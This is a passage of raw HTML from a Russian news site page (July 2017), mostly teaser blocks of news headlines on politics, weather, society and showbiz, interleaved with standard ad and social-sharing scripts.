						<a href="javascript:void(0);" onclick="return bookmark(this);">Избранное</a>,
						<a href="http://twitter.com/argumenti" target="_blank" rel="nofollow">Twitter</a>,
						<a href="http://www.facebook.com/pages/Argumentyru/110475665647188?ref=mf"  target="_blank" rel="nofollow">Facebook</a>,
						<a href="http://vkontakte.ru/club14409962" target="_blank" rel="nofollow">В Контакте</a>,
						<a href="http://my.mail.ru/community/argumenti" target="_blank" rel="nofollow">Мой мир</a>
					</div>

					<script type="text/javascript">
						// выпадающий список под ссылкой
						(function($) {
							$.fn.dropDownBlock = function(block, options) {
							var defaults = {
								speed: 'fast',
								top: $(this).height(),
								left: 0
							},
						opts 	= $.extend(defaults, options),
						toggler = $(this),
						block 	= $(block);
						toggler.css({'outline': 'none'})

						toggler.click(function(e) {
							e.preventDefault();
							$(block).css({
								'position' 	: 'absolute',
								'top' 		: (toggler.offset().top + opts['top']) + 'px',
								'left' 		: (toggler.offset().left + opts['left']) + 'px'
							});
						if($(block).is(':visible')) $(block).fadeOut(opts['speed']);
						else $(block).fadeIn(opts['speed']);
						this.focus();
						});
						toggler.blur(function() {
							$(block).fadeOut(opts['speed']);
						});
					};
				})(jQuery);

				$('#li_sub').dropDownBlock($('#drop_sub'));


			</script>



												<div id="initials">АТ</div>
									</div>


								<ul id="tags"><li>Теги:&nbsp;</li>
														<li>						<a href="http://argumenti.ru/search/%237%2B%D0%B8%D1%8E%D0%BB%D1%8F">7 июля</a>
					</li>
														<li>,&nbsp;						<a href="http://argumenti.ru/search/%23%D0%BB%D0%B5%D1%82%D0%BE">лето</a>
					</li>
														<li>,&nbsp;						<a href="http://argumenti.ru/search/%23%D1%82%D0%B5%D0%BC%D0%BF%D0%B5%D1%80%D0%B0%D1%82%D1%83%D1%80%D0%B0">температура</a>
					</li>
						</ul><br>
	

			
		
	<script type="text/javascript">commented()</script>


	<br/>
	



<p id="comment_info">Обсудить наши публикации можно на страничках «АН» в <a href="http://facebook.com/argumentinedeli" target="_blank" rel="nofollow">Facebook</a> и <a href="http://vk.com/club14409962" target="_blank" rel="nofollow">ВКонтакте</a></p>

<div id = "socmedia">
	<div id="fbook"></div>
	<div id="ok_shareWidget"></div>
	<div id="vk_like" style="margin-top: -5px;">
				<!-- Put this script tag to the place, where the Share button will be -->
				<script type="text/javascript"><!--
				document.write(VK.Share.button(false,{type: "round", text: "Сохранить"}));
				--></script>
	</div>

</div>


	<script type="text/javascript">$('#fbook').html('<iframe src="http://www.facebook.com/plugins/like.php?href='+u+'&amp;layout=button_count&amp;show_faces=true&amp;width=150&amp;action=recommend&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; height:21px;" allowTransparency="true"></iframe>');</script>



<script>
!function (d, id, did, st, title, description, image) {
  var js = d.createElement("script");
  js.src = "https://connect.ok.ru/connect.js";
  js.onload = js.onreadystatechange = function () {
  if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
    if (!this.executed) {
      this.executed = true;
      setTimeout(function () {
        OK.CONNECT.insertShareWidget(id,did,st, title, description, image);
      }, 0);
    }
  }};
  d.documentElement.appendChild(js);
}(document,"ok_shareWidget","http://argumenti.ru/",'{"sz":20,"st":"oval","nc":1,"ck":2}',"","","");
</script>

<p class="namerub"><span class="rem">//</span>Подписаться на рассылку эксклюзива от АН</p>
	<noindex>
		<iframe src="http://mailing.argumenti.ru/" style="width:97%; border: none;padding: 0px;">
	    	Ваш браузер не поддерживает плавающие фреймы!
		 </iframe>
	 </noindex>
		
	<div id="unit_83639"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
(function() {
var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
sc.src = '//js.advert.mirtesen.ru/data/js/83639.js'; sc.charset = 'utf-8';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
}());
</script>




			<div class="mainrub">
		<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>
	



	<img src="http://argumenti.ru/images/preview/arhnews/c8775e813e6fdc4734ec44cb0b5bf3fa.jpg" alt="В Пекине проходит массовая эвакуация из-за ливней" />
	
<p class="maxititle"><a href="http://argumenti.ru/world/2017/07/541128">В Пекине проходит массовая эвакуация из-за ливней</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/07/541128">В столице Китая Пекине проходит массовая эвакуация людей из-за сильнейших ливневых дождей, которые обрушились на город вчера. К настоящему моменту в безопасные места перевезли около 3,5 тысяч человек.</a></div>	</div>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/3bb3d01498b70da2577ac182b2608f46.jpg" alt="Пушков заявил о риске развязывания Трампом корейской войны" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/07/541059">Пушков заявил о риске развязывания Трампом корейской войны</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/07/541059">Сенатор Алексей Пушков заявил, что президент США Дональд Трамп может развязать корейскую войну, как его предшественники Джордж Буш и Барак Обама начали войну в Ливии и Ираке.

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a6335bb1f0679979f93f6d40ceb8d1a5.jpg" alt="Песков: вопрос участия Путина в выборах 2018 года пока не обсуждается" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/07/541103">Песков: вопрос участия Путина в выборах 2018 года пока не обсуждается</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/07/541103">Пресс-секретарь президента России Дмитрий Песков высказался сегодня об участии политика в выборах 2018 года. Он заявил, что обсуждение данного вопроса в настоящий момент не фигурирует в повестке дня.</a></div>		</div>
	</div>
	<a href="https://goo.gl/4hCiMx" rel="nofollow">
<img src="http://argumenti.ru/pub/images/partners/685.gif" width="600" height="90" alt="sungrado"  border="0" /></a>


<div id="unit_83639"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
(function() {
var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
sc.src = '//js.advert.mirtesen.ru/data/js/83639.js'; sc.charset = 'utf-8';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
}());
</script>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/economics">Экономика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a5d4df37a355e15b80e98ff09f1abda4.jpg" alt="На чем приходится экономить россиянам" />
	

<p class="minititle"><a href="http://argumenti.ru/economics/2017/07/541117">На чем приходится экономить россиянам</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/economics/2017/07/541117">Россиянам приходится экономить на еде, особенно на деликатесах;  на путешествиях, на развлечениях, на ресторанах, на гаджетах. Социологи узнали, на чем особенно экономили жители России в 2016 году. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/hitech">Хайтек</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/762efc5009734f1507ca140d9d2610ed.jpg" alt="Group-IB предупреждает об атаке &laquo;невидимого&raquo; вируса-вымогателя на смартфоны" />
	

<p class="minititle"><a href="http://argumenti.ru/hitech/2017/07/541102">Group-IB предупреждает об атаке &laquo;невидимого&raquo; вируса-вымогателя на смартфоны</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/hitech/2017/07/541102">Ведущая международная компания Group-IB, специализирующаяся на предотвращении и расследовании преступлений с использованием высоких технологий, обнаружила распространение нового вируса.

</a></div>		</div>
	</div>
<!-- заввершающая линия -->
	<div class="publ_line">
		<div class="publ_line_lend">
		</div>
		<div class="publ_line_rend">
		</div>
	</div>


	
<div id="yandex_under_article" style="margin:0 auto"></div>
<script type="text/javascript">
if (window.matchMedia("only screen and (max-device-width: 100px)").matches){document.getElementById("yandex_under_article").style.width = "100px";var m= 2; ty="posterVertical"}
else if (window.matchMedia("only screen and (min-device-width: 100px)").matches){var m= 2; ty="vertical"}
(function(w, d, n, s, t) {
   w[n] = w[n] || [];
   w[n].push(function() {
       Ya.Direct.insertInto(50615, "yandex_under_article", {
           ad_format: "direct",
           font_size: 0.8,
           type: "horizontal",
           limit: 2,
           title_font_size: 1,
           links_underline: false,
           site_bg_color: "E7E7E7",
           bg_color: "E7E7E7",
           header_bg_color: "FFFFFF",
           border_color: "FFFFFF",
           title_color: "673366",
           url_color: "333333",
           text_color: "000000",
           hover_color: "0066FF",
           sitelinks_color: "0000CC",
           favicon: true,
           no_sitelinks: true
       });
   });
   t = d.getElementsByTagName("script")[0];
   s = d.createElement("script");
   s.src = "//an.yandex.ru/system/context.js";
   s.type = "text/javascript";
   s.async = true;
   t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script>  
<br>
<!-- TR AN --><!--54569596--><!--54569596-->	<h2 class="namerub"><span class="rem">//</span>Новости Гнездо.ру</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14115">Загрузка...</div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14115/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/39e0521e820e13f98ad972634512f012.jpg" alt="&quot;КосмоКурс&quot; будет строить свои ракеты, если не сможет договориться с Роскосмосом" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541076">&quot;КосмоКурс&quot; будет строить свои ракеты, если не сможет договориться с Роскосмосом</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541076">В скором времени "КосмоКурс" - оператор в области суборбитального туризма - может начать создавать свою ракетно-космическую технику. Это произойдет, если организация не сможет договориться с Роскосмосом.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/aeddd01bc2dee7ede3e288fab053a83b.jpg" alt="В Петербурге появится социальная очередь к мощам Николая Чудотворца" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541108">В Петербурге появится социальная очередь к мощам Николая Чудотворца</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541108">Вице-губернатор Санкт-Петербурга Александр Говорунов заявил, что к мощам Николая Чудотворца будет организована социальная очередь. Уточняется, что будет также основная очередь в Александро-Невскую лавру.</a></div>		</div>
	</div>
	<h2 class="namerub"><span class="rem">//</span>Новости ADWILE</h2>
<div id="smi_teaser_10213">
<center><a href="http://partner.adwile.com" rel="nofollow">Нативная реклама ADWILE</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/4/c/10213.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/b004035cb0732e430a299a57c7ace6be.jpg" alt="Гражданская супруга Олега Яковлева рассказала о его последних днях и завещании" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/07/541077">Гражданская супруга Олега Яковлева рассказала о его последних днях и завещании</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/07/541077">Прошло семь дней со дня безвременной смерти 47-летнего солиста группы «Иванушки Интернешнл» Олега Яковлева. Его гражданская супруга Александра Куцевол решила развеять все слухи относительно его диагноза. 

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/meteo">Метеоновости</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/88912c3254e924eb0954ffa7f93fe0b0.jpg" alt="7 июля станет самым холодным днем месяца" />
	

<p class="minititle"><a href="http://argumenti.ru/meteo/2017/07/541109">7 июля станет самым холодным днем месяца</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/meteo/2017/07/541109">Пятница, 7 июля, в Москве обещает стать самым холодным днем текущего месяца, полагают синоптики. Уже сегодняшней ночью температура резко пойдет на спад, достигнув +9°C. 

</a></div>		</div>
	</div>
	<a href="https://goo.gl/4hCiMx" rel="nofollow">
<img src="http://argumenti.ru/pub/images/partners/685.gif" width="600" height="90" alt="sungrado"  border="0" /></a>


<p class="namerub"><span class="rem">//</span>Новости партнеров</p>
<div id="smi_teaser_3101">
    <center><a href="http://24smi.info" rel="nofollow">Агрегатор новостей 24СМИ</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
                (function() {
                var sm = document.createElement("script");
                sm.type = "text/javascript";
                sm.async = true;
                sm.src = "//jsn.24smi.net/6/2/3101.js";
                var s = document.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(sm, s);})();</script>
            
<hr>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/hitech">Хайтек</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/4cb1df2187e8d4d3b19777dc69fa9fd3.jpg" alt="Новый сервис для малого бизнеса создали Яндекс.Деньги" />
	

<p class="minititle"><a href="http://argumenti.ru/hitech/2017/07/541133">Новый сервис для малого бизнеса создали Яндекс.Деньги</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/hitech/2017/07/541133">Яндекс.Деньги представили новый сервис. С его помощью можно организовать приём оплаты на сайте без технической интеграции. Сервис подойдёт небольшим компаниям, которые хотят попробовать оплату через интернет.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/hitech">Хайтек</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/51b4fc8f630f05e1882b356f2d643a76.jpeg" alt="Одноклассники интегрировали сервис объявлений Юла" />
	

<p class="minititle"><a href="http://argumenti.ru/hitech/2017/07/541131">Одноклассники интегрировали сервис объявлений Юла</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/hitech/2017/07/541131">Сервис бесплатных объявлений Юла стал доступен пользователям Одноклассников в новом разделе социальной сети. Объявление, размещенное в Одноклассниках, становится доступно на Юле и наоборот.</a></div>		</div>
	</div>

		

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/cb94ee25098a129f676462c078e93eca.jpg" alt="Названы имена генералов МВД, ФСИН и МЧС, снятых 6 июля Путиным" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541129">Названы имена генералов МВД, ФСИН и МЧС, снятых 6 июля Путиным</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541129">Согласно указу президента РФ Владимира Путина, в МВД, ФСИН и МЧС произведены кадровые перестановки. От должностей освобождены:  первый замначальника ГУ на транспорте МВД генерал-майор полиции Андрей Андреев.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d0925215afd02024bb096ebaa0984305.jpg" alt="На МКАД обстреляли автомобиль и похитили из него сумку с деньгами" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2017/07/541126">На МКАД обстреляли автомобиль и похитили из него сумку с деньгами</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2017/07/541126">На Московской кольцевой автодороге неизвестные злоумышленники обстреляли иномарку и похитили из нее сумку с деньгами. Согласно последним данным, преступники украли из автомобиля 100 тысяч рублей.</a></div>		</div>
	</div>


	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/economics">Экономика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/f8e11c5712230906f9473e2145cc2482.jpg" alt="Минэкономразвития  назвало погоду основной причиной роста безработицы" />
	

<p class="minititle"><a href="http://argumenti.ru/economics/2017/07/541127">Минэкономразвития  назвало погоду основной причиной роста безработицы</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/economics/2017/07/541127">Погода никому в России в этом году не дает покоя. Минэкономразвития  назвало погоду основной причиной роста безработицы в мае. Холода повлияли на работу в сельском хозяйстве, туризме и ресторанном бизнесе.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/sport">Спорт</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/88d7f5c6a600dd0b2daa383fcea33e2a.jpg" alt="Трехмесячный ребенок стал самым юным болельщиком на Кубке конфедераций" />
	

<p class="minititle"><a href="http://argumenti.ru/sport/2017/07/541124">Трехмесячный ребенок стал самым юным болельщиком на Кубке конфедераций</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/sport/2017/07/541124">Самым юным болельщиком на Кубке конфедераций стал трехмесячный ребенок. Что касается самого возрастного человека, получившего паспорт болельщика, то им стал мужчина, которому больше 85 лет.</a></div>		</div>
	</div>




	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/b70fa7fb21feb590bc97eceecba17b18.jpg" alt="Шнуров и Киркоров поборются за пост президента" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/07/541125">Шнуров и Киркоров поборются за пост президента</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/07/541125">Лидер группировки "Ленинград" Сергей Шнуров и король российской эстрады Филипп Киркоров - просто нарасхват.  Шнуров и Киркоров - кандидаты на пост президента  рок-фестиваля "Нашествие".</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/75f3f930d0618d629b14a6eb162b6f92.jpg" alt="Паулина Андреева угощает Федора Бондарчука пиццей и газировкой" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/07/541122">Паулина Андреева угощает Федора Бондарчука пиццей и газировкой</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/07/541122">Роман режиссера Федора Бондарчука и актрисы Паулины Андреевой стремительно развивается. Недавно влюбленные устроили вечеринку для себя и друзей, гвоздем которой были пицца и газированные напитки.</a></div>		</div>
	</div>

	<!-- заввершающая линия -->
	<div class="publ_line">
		<div class="publ_line_lend">
		</div>
		<div class="publ_line_rend">
		</div>
	</div>


	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/15bcf2ee0c3910446be992149f7b25b1.jpg" alt="Поклонская призвала не присылать  ей безобразные амплуа актера &quot;Матильды&quot;" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541121">Поклонская призвала не присылать  ей безобразные амплуа актера &quot;Матильды&quot;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541121">Депутат Госдумы, экс-прокурор Крыма Наталья Поклонская призвала не  присылать ей примеры актерских работ Ларса Айдингера, снявшегося в роли императора  Николая II в фильме Алексея Учителя "Матильда".
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/72483dbfc40cddf0325c002dd4dba630.png" alt="В Салехарде во дворе детского сада мужчина стрелял по мишеням из винтовки" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2017/07/541118">В Салехарде во дворе детского сада мужчина стрелял по мишеням из винтовки</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2017/07/541118">Житель Салехарда вчера устроил на территории детского сада стрельбу по мишеням из пневматической винтовки. После резонансного инцидента местные полицейские проводят тщательную проверку.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/816d8820fd5776689523914695ce4d76.png" alt="Чудо-асфальт укладывают в Омске" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541120">Чудо-асфальт укладывают в Омске</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541120">Омские дорожники готовятся удивить водителей в хорошем смысле слова. Они укладывают на городские трассы так называемый "самозалечивающийся" асфальт. И обещают, что ям на таком покрытии не будет как минимум 10 лет.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ad83045639cc0b07ae92d17738092c49.jpg" alt="Путин и Назарбаев поговорили о путях урегулирования кризиса в Сирии" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/07/541116">Путин и Назарбаев поговорили о путях урегулирования кризиса в Сирии</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/07/541116">В четверг, 6 июля, президент России Владимир Путин и глава Казахстана Нурсултан Назарбаев поговорили по телефону. В рамках беседы политики обсудили тяжелую ситуацию в Сирии, а также пути урегулирования конфликта.</a></div>		</div>
	</div>


	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/culture">Культура</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/98e52c879819d86b60478b41a3744f25.jpg" alt="Фестиваль &laquo;Бродский Drive&raquo; будет радовать любителей джаза Петербурга целый месяц" />
	

<p class="minititle"><a href="http://argumenti.ru/culture/2017/07/541115">Фестиваль &laquo;Бродский Drive&raquo; будет радовать любителей джаза Петербурга целый месяц</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/culture/2017/07/541115">В период с 18 июня по 17 июля, каждые выходные, в саду Фонтанного дома (Музея Анны Ахматовой) на Литейном проспекте, 53, будут проходить концерты джазового фестиваля «Бродский Drive».</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/0ecfcc1fa604462ec0f03e511aba6944.jpg" alt="Каждый десятый выпускник российского вуза может не получить работу" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541114">Каждый десятый выпускник российского вуза может не получить работу</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541114">Аналитический центр при правительстве РФ предоставил доклад, в котором содержатся неутешительные данные. Оказывается, что каждый десятый выпускник российского вуза рискует не найти работу.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/87ba55a8f9db9dfc6aea26a09447d3e7.jpg" alt="Как будут выглядеть &quot;собянинки&quot;, власти Москвы показали на макетах" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541113">Как будут выглядеть &quot;собянинки&quot;, власти Москвы показали на макетах</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541113">Власти Москвы представили макеты новых столичных кварталов, которые появятся в рамках программы реновации. Все они выполнены в натуральную величину с соблюдением всех деталей отделки, вплоть до дверных ручек.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/culture">Культура</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/474868832d0e3818e4193785c46b5811.jpg" alt="Путин не посетит похороны писателя Даниила Гранина в Петербурге" />
	

<p class="minititle"><a href="http://argumenti.ru/culture/2017/07/541112">Путин не посетит похороны писателя Даниила Гранина в Петербурге</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/culture/2017/07/541112">Сегодня стало известно, что российский лидер Владимир Путин не приедет в Санкт-Петербург на похороны писателя Даниила Гранина. Об этом в четверг сообщил пресс-секретарь президента РФ Дмитрий Песков.</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/177b847696efaf47192ef2bb4e8ab2a5.jpg" alt="Концертному аферисту Лунькову дали три года колонии" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541111">Концертному аферисту Лунькову дали три года колонии</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541111">Сегодня в Киевском районном суде Симферополя был вынесен приговор концертному аферисту Константину ЛУНЬКОВУ за мошенничество при продаже билетов на несостоявшийся концерт «Дискотека 80-х» на стадионе «Локомотив».</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/e9bc70513672e5270d45535c3b050b64.jpg" alt="Роснефть vs. АФК &laquo;Система&raquo; - это столкновение двух программ развития России" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541110">Роснефть vs. АФК &laquo;Система&raquo; - это столкновение двух программ развития России</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541110">Судебный процесс «Роснефти» против АФК «Система»  олигарха Владимира Евтушенкова за нефтяной актив в виде ООО «Башнефть» следует оценивать  как желание государства избавиться от наследия олигархической «семибанкирщины» 90-х. </a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/9bba1aee84ed6ddb4f5ffb94f842c404.jpg" alt="Мигранты заставляли похищенного бомжа заниматься попрошайничеством" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2017/07/541107">Мигранты заставляли похищенного бомжа заниматься попрошайничеством</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2017/07/541107">Питерская полиция задержала двух уроженцев Таджикистана, которых подозревают в похищении бездомного и принуждении его к попрошайничеству. Об этом в полицию заявил сам потерпевший, которому удалось бежать из «рабства».

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/573ae21cd9f8b59d99945d65905a5d22.jpg" alt="Джордж Клуни впервые появился с новорожденными детьми на публике" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/07/541105">Джордж Клуни впервые появился с новорожденными детьми на публике</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/07/541105">Джордж Клуни и его супруга Амаль впервые появились с новорожденными близнецами на публике. Папарацци смогли "подловить" семью актера в аэропорту Милана - муж, жена и дети выходили из частного самолета.</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/meteo">Метеоновости</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d40ca0daf909c1df1ecea3ed44ffdd45.jpg" alt="Синоптики рассказали о сентябрьской прохладе и 30-градусной жаре этим летом" />
	

<p class="minititle"><a href="http://argumenti.ru/meteo/2017/07/541106">Синоптики рассказали о сентябрьской прохладе и 30-градусной жаре этим летом</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/meteo/2017/07/541106">Вся текущая неделя будет прохладной и дождливой. До субботы на Московскую область будет идти холодный воздух из северного циклона. Ближайшей ночью температура понизится до +9 градусов и больше будет напоминать сентябрь.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/e3ca6c31313feec45eb6636e28d2aeb4.jpg" alt="Владимир Путин освободил от должностей восемь генералов МВД, ФСИН и МЧС" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541104">Владимир Путин освободил от должностей восемь генералов МВД, ФСИН и МЧС</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541104">Глава России Владимир Путин в четверг, 6 июля, освободил от должностей восемь генералов. Согласно последней информации, изменения коснулись структур МВД, Федеральной службы исполнения наказаний и МЧС.</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




